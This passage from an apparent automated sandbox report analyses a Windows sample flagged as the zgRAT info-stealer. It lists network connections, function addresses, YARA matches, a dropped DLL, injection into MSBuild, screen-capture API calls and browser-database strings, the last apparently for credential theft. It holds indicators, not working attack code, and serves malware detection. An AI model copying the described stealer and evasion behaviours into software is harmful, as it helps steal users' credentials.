                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                            Source: unknownHTTPS traffic detected: 23.4.32.216:443 -> 192.168.2.4:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49733 version: TLS 1.2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411D10 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_00411D10

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: YyIDUCFWC1.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 0.0.YyIDUCFWC1.exe.680000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC262C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,1_2_6CC262C0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEFB6B00_2_6CEFB6B0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF4AC290_2_6CF4AC29
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEF2D700_2_6CEF2D70
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF24EE00_2_6CF24EE0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF149700_2_6CF14970
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF14AC00_2_6CF14AC0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF40B890_2_6CF40B89
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CED8B300_2_6CED8B30
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF145500_2_6CF14550
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF4A54D0_2_6CF4A54D
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CED66500_2_6CED6650
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEDA7E00_2_6CEDA7E0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEDC7B00_2_6CEDC7B0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CEEA0C00_2_6CEEA0C0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF263B00_2_6CF263B0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF323100_2_6CF32310
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF31CA00_2_6CF31CA0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF13C900_2_6CF13C90
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF25DD00_2_6CF25DD0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF45DD20_2_6CF45DD2
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF25EB90_2_6CF25EB9
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF13E500_2_6CF13E50
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF4BFF10_2_6CF4BFF1
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF49FFC0_2_6CF49FFC
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF258D70_2_6CF258D7
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF258D50_2_6CF258D5
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF258300_2_6CF25830
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF4B9640_2_6CF4B964
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF49AAB0_2_6CF49AAB
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF134600_2_6CF13460
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF250500_2_6CF25050
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF252740_2_6CF25274
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_6CF132600_2_6CF13260
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D5C2D80_2_02D5C2D8
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D58EE80_2_02D58EE8
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D578E00_2_02D578E0
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D50D800_2_02D50D80
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D50D700_2_02D50D70
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_02D515210_2_02D51521
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_053200400_2_05320040
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_053202480_2_05320248
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_05B00EB30_2_05B00EB3
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_05B026F80_2_05B026F8
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_05B009300_2_05B00930
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: 0_2_05B026DC0_2_05B026DC
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041D38A1_2_0041D38A
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041F4C01_2_0041F4C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041CE391_2_0041CE39
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041DFB71_2_0041DFB7
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CA9ECC01_2_6CA9ECC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFECD01_2_6CAFECD0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB7AC301_2_6CB7AC30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB66C001_2_6CB66C00
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAAAC601_2_6CAAAC60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2CDC01_2_6CC2CDC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA4DB01_2_6CAA4DB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB36D901_2_6CB36D90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6ED701_2_6CB6ED70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC28D201_2_6CC28D20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBCAD501_2_6CBCAD50
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB26E901_2_6CB26E90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAAAEC01_2_6CAAAEC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB40EC01_2_6CB40EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB80E201_2_6CB80E20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB3EE701_2_6CB3EE70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE8FB01_2_6CBE8FB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAAEFB01_2_6CAAEFB0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB7EFF01_2_6CB7EFF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA0FE01_2_6CAA0FE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE0F201_2_6CBE0F20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA6F101_2_6CAA6F10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB62F701_2_6CB62F70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB0EF401_2_6CB0EF40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA68E01_2_6CBA68E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF08201_2_6CAF0820
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2A8201_2_6CB2A820
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB748401_2_6CB74840
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB609B01_2_6CB609B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB309A01_2_6CB309A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB5A9A01_2_6CB5A9A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBC9E01_2_6CBBC9E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD49F01_2_6CAD49F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF69001_2_6CAF6900
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD89601_2_6CAD8960
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1EA801_2_6CB1EA80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB58A301_2_6CB58A30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB4EA001_2_6CB4EA00
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB1CA701_2_6CB1CA70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB40BA01_2_6CB40BA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA6BE01_2_6CBA6BE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBCA4801_2_6CBCA480
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB3A4D01_2_6CB3A4D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAE64D01_2_6CAE64D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2A4301_2_6CB2A430
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB044201_2_6CB04420
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB84601_2_6CAB8460
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CA945B01_2_6CA945B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2E5F01_2_6CB2E5F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6A5E01_2_6CB6A5E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB405701_2_6CB40570
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB025601_2_6CB02560
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE85501_2_6CBE8550
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF85401_2_6CAF8540
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA45401_2_6CBA4540
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFE6E01_2_6CAFE6E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB3E6E01_2_6CB3E6E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC46D01_2_6CAC46D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFC6501_2_6CAFC650
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACA7D01_2_6CACA7D0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB207001_2_6CB20700
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB7C0B01_2_6CB7C0B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB00B01_2_6CAB00B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CA980901_2_6CA98090
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB680101_2_6CB68010
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6C0001_2_6CB6C000
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEE0701_2_6CAEE070
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA01E01_2_6CAA01E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB161301_2_6CB16130
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB841301_2_6CB84130
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB081401_2_6CB08140
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC262C01_2_6CC262C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6E2B01_2_6CB6E2B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB722A01_2_6CB722A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB782201_2_6CB78220
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6A2101_2_6CB6A210
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB282601_2_6CB28260
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB382501_2_6CB38250
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD23A01_2_6CAD23A0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFE3B01_2_6CAFE3B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF43E01_2_6CAF43E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB123201_2_6CB12320
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB363701_2_6CB36370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE23701_2_6CBE2370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA23701_2_6CAA2370
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBC3601_2_6CBBC360
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA83401_2_6CAA8340
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB3FC801_2_6CB3FC80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB61CE01_2_6CB61CE0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDDCD01_2_6CBDDCD0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB1C301_2_6CAB1C30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAA3C401_2_6CAA3C40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC9C401_2_6CBC9C40
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CA93D801_2_6CA93D80
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE9D901_2_6CBE9D90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB71DC01_2_6CB71DC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB03D001_2_6CB03D00
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC3EC01_2_6CAC3EC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC25E601_2_6CC25E60
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBADE101_2_6CBADE10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFBE701_2_6CBFBE70
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC23FC01_2_6CC23FC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAC1F901_2_6CAC1F90
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB4BFF01_2_6CB4BFF0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBDFC01_2_6CBBDFC0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD5F201_2_6CAD5F20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CA95F301_2_6CA95F30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF7F201_2_6CBF7F20
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB7F8F01_2_6CB7F8F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAAD8E01_2_6CAAD8E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAD38E01_2_6CAD38E0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFB8F01_2_6CBFB8F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB3F8C01_2_6CB3F8C0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAC9B10 appears 76 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CC2DAE0 appears 60 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAC3620 appears 74 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CC2D930 appears 49 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CBD9F30 appears 31 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00402360 appears 286 times
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CC209D0 appears 268 times
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: String function: 6CF390D8 appears 51 times
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: String function: 6CF3D520 appears 31 times
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeCode function: String function: 6CF39B35 appears 141 times
                            Source: YyIDUCFWC1.exeStatic PE information: invalid certificate
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.000000000449D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1709795517.0000000005B41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701548677.0000000004312000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1709599903.0000000005AD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1699708698.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAWSVPNClient.Core.dllD vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000000.1691360547.0000000000682000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenewsmakeformula_city7.exeL, vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1708250819.0000000005848000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWindowsApp1.dll8 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exe, 00000000.00000002.1701132649.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProtect.dll8 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exeBinary or memory string: OriginalFilenameNewtonsoft.Json.dll4 vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exeBinary or memory string: OriginalFilenameAWSVPNClient.Core.dllD vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exeBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exeBinary or memory string: OriginalFilenamenewsmakeformula_city7.exeL, vs YyIDUCFWC1.exe
                            Source: YyIDUCFWC1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: YyIDUCFWC1.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 0.0.YyIDUCFWC1.exe.680000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: YyIDUCFWC1.exe, Module1.csCryptographic APIs: 'TransformFinalBlock'
                            Source: YyIDUCFWC1.exe, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                            Source: YyIDUCFWC1.exe, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                            Source: YyIDUCFWC1.exe, mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/27@1/2
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB00300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,1_2_6CB00300
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,1_2_00410AA0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,1_2_00411020
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YyIDUCFWC1.exe.logJump to behavior
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMutant created: NULL
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to behavior
                            Source: YyIDUCFWC1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: YyIDUCFWC1.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                            Source: C:\Users\user\Desktop\YyIDUCFWC1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                            Source: nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
